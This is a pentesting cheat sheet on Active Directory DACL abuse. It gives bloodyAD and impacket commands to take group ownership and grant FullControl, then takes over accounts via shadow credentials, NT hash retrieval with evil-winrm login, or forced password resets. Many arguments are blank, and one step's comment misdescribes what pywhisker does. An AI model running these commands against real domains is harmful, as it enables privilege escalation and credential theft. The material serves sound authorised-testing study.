# DACL (Discretionary Access Control List) Attack DACL is a list of the trustees that are allowed or denied access to objects in Active Directory. ### Set Ownership of Group Using [BloodyAD](https://github.com/CravateRouge/bloodyAD), we can set the user as the owner of a group. ``` # Install if it does not exist on your machine. pipx install bloodyAD bloodyAD --host dc.example.local -d example.local -u -p set owner ``` ### Add Rights We may be able to take a full control of securable objects by getting GenericAll permission on OU (Organizational Unit). #### 1. Ask TGT for Kerberos Authentication If we want to use Kerberos authentication for attacking DACL, we need to retrieve a TGT for specific user at first. In addition, to avoid authentication error, we need to synchronize the system time with the domain controller using `ntpdate` or `rdate`. ``` # Sync datetime with target system sudo ntpdate # or sudo rdate -n impacket-getTGT -dc-ip example.local/username:password ``` The `getTGT` above dumps a `.ccache` file which stores TGT. After dumping the `.ccache` file, set it to an environment variable for using the later processing. ``` export KRB5CCNAME=username.ccache ``` #### 2. Read DACL We can use `dacledit` of `impackets`.\ To use `dacledit`, we need to clone the repository and install dependencies as below: ``` git clone https://github.com/fortra/impacket.git cd impacket python3 -m venv .venv source .venv/bin/activate pip3 install impacket pip3 install -r requirements.txt python3 examples/dacledit.py --help ``` Note: This repository is updated frequently so errors may occur. If so, try using the `git log` and `git checkout ` commands to revert to the previous commit and then run it. Then run the following command: ``` python3 examples/dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password # -use-ldaps: Use LDAPS instead of LDAP # -k: Use Kerberos authentication python3 examples/dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password -use-ldaps -k ``` #### 3. Write DACL ``` python3 examples/dacledit.py -action write -rights 'FullControl' -principal username -target-dn'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password -use-ldaps -k # -use-ldaps: Use LDAPS instead of LDAP # -k: Use Kerberos authentication python3 examples/dacledit.py -action write -rights 'FullControl' -principal username -target-dn'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password -use-ldaps -k ``` ### Abuse After adding rights, we can abuse it with various methods. #### Method 1. Add User to Group → Get TGT → Get NT Hash ``` # 1. Add user to a specific group (replace the group distinguished name with your target) bloodyAD --host -u -p add groupMember 'CN=Example Group,CN=Users,DC=EXAMPLE,DC=LOCAL' # with Kerberos auth (-k) bloodyAD --host -u -k add groupMember 'CN=Example Group,CN=Users,DC=EXAMPLE,DC=LOCAL' # 2. Add the target user to a privileged group python3 pywhisker.py -d example.local -u -p --target --action add # 3. Obtain a Kerberos TGT using PKINIT authentication with a PFX certificate python3 gettgtpkinit.py example.local/ -cert-pfx -pfx-pass ./example.ccache export KRB5CCNAME=./example.ccache # 4. Retrieve the NT hash of the target user using the obtained Kerberos ticket python3 getnthash.py example.local/ -key # 5. Login with the retrieved NT hash evil-winrm -i -u -H ``` #### Method 2. Set Password of Another User If an user have the permission to set another user password, we can change the password: ``` bloodyAD --host -u -p set password '' '' # with Kerberos auth (-k) bloodyAD --host -u -k set password '' '' ``` After that, we can try further attacks using this user. ### References * [The Hacker Recipes](https://www.thehacker.recipes/a-d/movement/dacl) * [Microsot Learn](https://learn.microsoft.com/en-us/windows/win32/secauthz/access-control-lists)